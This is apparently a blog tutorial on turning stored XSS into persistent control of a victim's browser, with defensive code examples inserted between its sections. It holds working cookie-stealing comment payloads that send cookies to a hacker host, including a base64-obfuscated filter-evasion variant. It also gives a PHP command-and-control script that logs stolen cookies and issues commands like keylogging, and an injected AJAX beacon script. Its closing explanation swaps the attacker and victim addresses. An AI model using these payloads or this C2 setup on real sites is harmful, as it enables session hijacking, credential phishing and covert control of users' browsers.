Escalating XSS to control the browser with a malicious AJAX payload injection

Hello friends, welcome again. Today I will explain, at a very basic level, how to exploit XSS with an AJAX payload.

What is the benefit of injecting an AJAX payload instead of a plain JavaScript payload?

With AJAX I can create a complete C&C-like environment to control the victim browser: it receives commands from the hacker's server at runtime, executes them, and reports the results back to the attacker's server. Examples of such commands are:

  • Hacking cookies
  • Browser keylogging
  • Showing phishing dialogs to the victim for credential harvesting
  • Opening popups/popunders
  • Using the victim browser as a proxy
  • Sending spam emails
  • Clicking ads

We cannot simulate a C&C environment with a plain JavaScript payload. I must say, in this scenario plain JavaScript is ONE-time, and AJAX is ALL-time connectivity with the victim browser.

What is XSS and how to exploit?

XSS stands for Cross Site Scripting. It is a process in which a hacker injects a malicious script into a vulnerable website. Let's understand it with an example. Assume there is a blog where writers publish their articles. Visitors read the articles to learn, and also give feedback on them in the comments section. Comments are saved in the backend database. Now, a hacker can inject a malicious script into the comments section, which is saved in the server database as well. When another user reaches the blog article, the comments of other users are displayed too. To the browser, the article and comments are HTML, JavaScript and AJAX instructions, which it will execute without distinguishing whether the content was created by the website developer, the article writer, or the hacker.
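The blog in the example is vulnerable only because it writes the stored comment into the page verbatim. The following is an added example (not code from the original post) showing the vulnerable rendering beside the hardened one: a template that HTML-encodes every untrusted field at output time, plus a rough check a reviewer can run over rendered output. The function names (escapeHtml, renderCommentUnsafe, renderCommentSafe, containsForeignTags) and the sample comment are this example's own, not from any framework or from the post.

```javascript
// Added example: output encoding of stored comments (defender side of stored XSS).

// Escape the five characters that can open or alter an HTML or attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the stored comment is concatenated straight into the page, so any
// <script> inside it becomes part of the document for every later visitor.
function renderCommentUnsafe(author, body) {
  return `<li><b>${author}</b>: ${body}</li>`;
}

// Hardened: every untrusted field is HTML-encoded when the page is built,
// so the browser shows the markup as text instead of executing it.
function renderCommentSafe(author, body) {
  return `<li><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</li>`;
}

// Review check: does any tag other than those the template itself emits survive
// in the rendered HTML? Returns true when a foreign tag is present.
function containsForeignTags(html, allowedTags) {
  const tags = html.match(/<\/?([a-zA-Z][\w-]*)/g) || [];
  return tags.some(t => !allowedTags.includes(t.replace(/^<\/?/, "").toLowerCase()));
}

// Constructed sample: a friendly-looking comment that carries a script tag.
const SAMPLE_COMMENT = "Very helpful article! <script>alert(document.domain)</script>";
const TEMPLATE_TAGS = ["li", "b"];

// Stand-alone demonstration.
console.log(renderCommentUnsafe("visitor", SAMPLE_COMMENT));
console.log(renderCommentSafe("visitor", SAMPLE_COMMENT));
console.log("unsafe leaks a tag:", containsForeignTags(renderCommentUnsafe("visitor", SAMPLE_COMMENT), TEMPLATE_TAGS));
console.log("safe leaks a tag:  ", containsForeignTags(renderCommentSafe("visitor", SAMPLE_COMMENT), TEMPLATE_TAGS));
```

The encoding happens at output time rather than on input, because the same stored string may later be placed in a different context (an attribute, a JSON blob, an email) that needs a different encoder.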

Hacking cookies with malicious payload:

Very helpful article! 
new Image().src="http://hackersite.com/save.php?cc" %2b escape(document.cookie);

If URL keywords like http:// are blocked on the server, you can store the URL base64-encoded and decode it at runtime with atob(BASE_64_ENCODED_URL):

Very helpful article! 
new Image().src = atob("aHR0cDovL2hhY2tlcnNpdGUuY29tL3NhdmUucGhwP2Nj") %2b escape(document.cookie);

The script reads the cookies and sends them to hackersite.com. We hacked the cookies.
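Whether the payload above gets anything useful depends on how the session cookie was set: document.cookie never exposes a cookie flagged HttpOnly. The following is an added example (not code from the original post) that parses a Set-Cookie header and reports which of the attributes limiting cookie theft are missing. The function names (parseSetCookie, auditSessionCookie) and the two sample headers are constructed for this example.

```javascript
// Added example: audit a Set-Cookie header for the attributes that blunt cookie theft.

// Parse "name=value; Attr; Attr=val" into its parts. Attribute names are
// case-insensitive per RFC 6265, so they are lower-cased as keys.
function parseSetCookie(header) {
  const parts = header.split(";").map(p => p.trim()).filter(Boolean);
  const [name, ...rest] = parts[0].split("=");
  const attrs = {};
  for (const p of parts.slice(1)) {
    const i = p.indexOf("=");
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    const val = i === -1 ? true : p.slice(i + 1).trim();
    attrs[key] = val;
  }
  return { name: name.trim(), value: rest.join("="), attrs };
}

// Returns a list of findings for a session cookie; an empty list means hardened.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!("httponly" in c.attrs)) findings.push("missing HttpOnly: cookie is readable through document.cookie");
  if (!("secure" in c.attrs)) findings.push("missing Secure: cookie is also sent over plain HTTP");
  const ss = typeof c.attrs.samesite === "string" ? c.attrs.samesite.toLowerCase() : null;
  if (ss !== "lax" && ss !== "strict") findings.push("SameSite not Lax or Strict: cookie rides on cross-site requests");
  return findings;
}

// Constructed sample headers: the default PHP session cookie and a hardened one.
const WEAK_COOKIE = "PHPSESSID=abc123; Path=/";
const HARDENED_COOKIE = "PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax";

// Stand-alone demonstration.
console.log("weak:    ", auditSessionCookie(WEAK_COOKIE));
console.log("hardened:", auditSessionCookie(HARDENED_COOKIE));
```

HttpOnly does not stop the injected script from acting inside the page (keylogging, forged requests with the ambient cookie), but it does stop the cookie value itself from leaving the browser in a request like the one shown above.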

Escalating XSS to control the victim browser

Now we want to go one step further and leverage XSS to control the victim browser.

What is Same Origin Policy, aka SOP?

The Same Origin Policy is a security feature implemented in the browser to stop hackers from reading the DOM of websites they do not own. SOP is enabled in all browsers by default.

SOP says that a script in one domain's context can send an HTTP request to a resource on another domain, but cannot read the response. The request goes out, but no response is available to the script.

What is necessary configuration required?

We have to enable Cross Origin Resource Sharing (CORS) on the attacker's web server, so that the victim's browser is allowed to read our responses.

How to enable CORS?

I created a .htaccess file in the root directory of my website with the following contents:

Header set Access-Control-Allow-Origin "*"

Here is the attacker web server IP address: 192.168.8.100

Without CORS, this error comes:

Failed to load http://192.168.8.100/server.php: No ‘Access-Control-Allow-Origin’ header is present on the requested resource. Origin ‘http://192.168.8.101’ is therefore not allowed access.
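The error quoted above is the browser enforcing SOP: the request reached 192.168.8.100, but the response was withheld from the script because no Access-Control-Allow-Origin header was present. The following is an added example (not code from the original post) modelling that decision, together with the allow-list configuration a defender uses instead of "*". The function names (corsResponseReadable, corsHeadersFor) are this example's own; the origins used in the stand-alone run are the two addresses from the post plus constructed ones.

```javascript
// Added example: a model of the browser's basic CORS read decision, and a server-side
// allow-list as the hardened counterpart of Access-Control-Allow-Origin: *.

// Decide whether a script running at requestOrigin may read a cross-origin response
// carrying responseHeaders. The request itself is always sent; only readability is gated.
function corsResponseReadable(requestOrigin, responseHeaders, withCredentials = false) {
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) h[k.toLowerCase()] = v;
  const acao = h["access-control-allow-origin"];
  if (acao === undefined) return false;            // the "No 'Access-Control-Allow-Origin' header" error
  if (acao === "*") return !withCredentials;       // wildcard is never honoured for credentialed requests
  if (acao !== requestOrigin) return false;        // value must match the request's Origin exactly
  if (withCredentials) return h["access-control-allow-credentials"] === "true";
  return true;
}

// Server side: reflect only origins on an explicit allow-list, and add Vary: Origin
// so caches do not serve one origin's header to another. Reflecting every Origin
// blindly would be equivalent to "*" with credentials, which is the weak setting.
function corsHeadersFor(requestOrigin, allowlist) {
  if (!allowlist.includes(requestOrigin)) return {};
  return { "Access-Control-Allow-Origin": requestOrigin, "Vary": "Origin" };
}

// Stand-alone demonstration with the origins from the post and a constructed allow-list.
const VICTIM_ORIGIN = "http://192.168.8.101";
console.log("no header:      ", corsResponseReadable(VICTIM_ORIGIN, {}));
console.log("wildcard:       ", corsResponseReadable(VICTIM_ORIGIN, { "Access-Control-Allow-Origin": "*" }));
console.log("wildcard+creds: ", corsResponseReadable(VICTIM_ORIGIN, { "Access-Control-Allow-Origin": "*" }, true));
const ALLOWLIST = ["https://app.example"];
console.log("allow-listed:   ", corsResponseReadable("https://app.example", corsHeadersFor("https://app.example", ALLOWLIST)));
console.log("not listed:     ", corsResponseReadable("https://other.example", corsHeadersFor("https://other.example", ALLOWLIST)));
```

Note what the model makes explicit: CORS only ever relaxes SOP for the server that sends the header. The attacker setting "*" on their own server lets their own script read their own responses; it does not give them anything from the victim site that SOP was protecting.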

Server PHP script to send commands and receive responses

I created server.php, which saves the received query-string data to logs.txt and sends commands:

<?php
error_reporting(0); // Turn off error reporting
// Save received data to logs.txt
file_put_contents('logs.txt', "[ " . date("Y-m-d h:i:sa ") . " ]\r\n[" . $_REQUEST["cc"] . "]\r\n\r\n", FILE_APPEND | LOCK_EX);
// I am sending static commands here.
// You could insert commands into a database and read the new commands from it at this point.
$commands = array("commands" => array("startKeylogger", "fetchCookies", "cmd3"));
echo json_encode($commands);
?>

Now, I will inject a malicious comment as:

Nice article
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script>
var dataString = "cc=" + escape(document.cookie);
$.ajax({
    url: "http://192.168.8.100/server.php",
    data: dataString,
    dataType: "json",
    success: function(data) {
        console.log("commands: " + data.commands.toString());
        // Execute commands here, and report back to the server with results.
        // Check the server periodically for new commands.
    }
});
</script>

Since CORS is enabled, this script, executing in the origin http://192.168.8.100/dvwa/vulnerabilities/xss_s/index.php, can send the request to http://192.168.8.101/server.php and read the response.

Thanks to CORS.

Conclusion

The objective of this article was to present the benefits of injecting an AJAX payload while exploiting XSS to control the victim browser, and how to achieve this at a very basic level. Once we are controlling the victim browser, we can execute many commands at run time, including but not limited to browser keylogging, displaying phishing dialogs for credential harvesting, opening popups and popunders, and using the victim browser as a proxy. The important configuration required is to enable CORS on our attacking web server.

OK, that is all for this article. I hope you learned something from it. Please let me know your feedback for improvement.

Lastly, I want to say thanks to Syed Ishaq and Mukarram Khalid for encouraging me to pursue publishing blog articles. And thanks to everyone who reads my articles.

Good bye for now, see you next time with a new article! AH
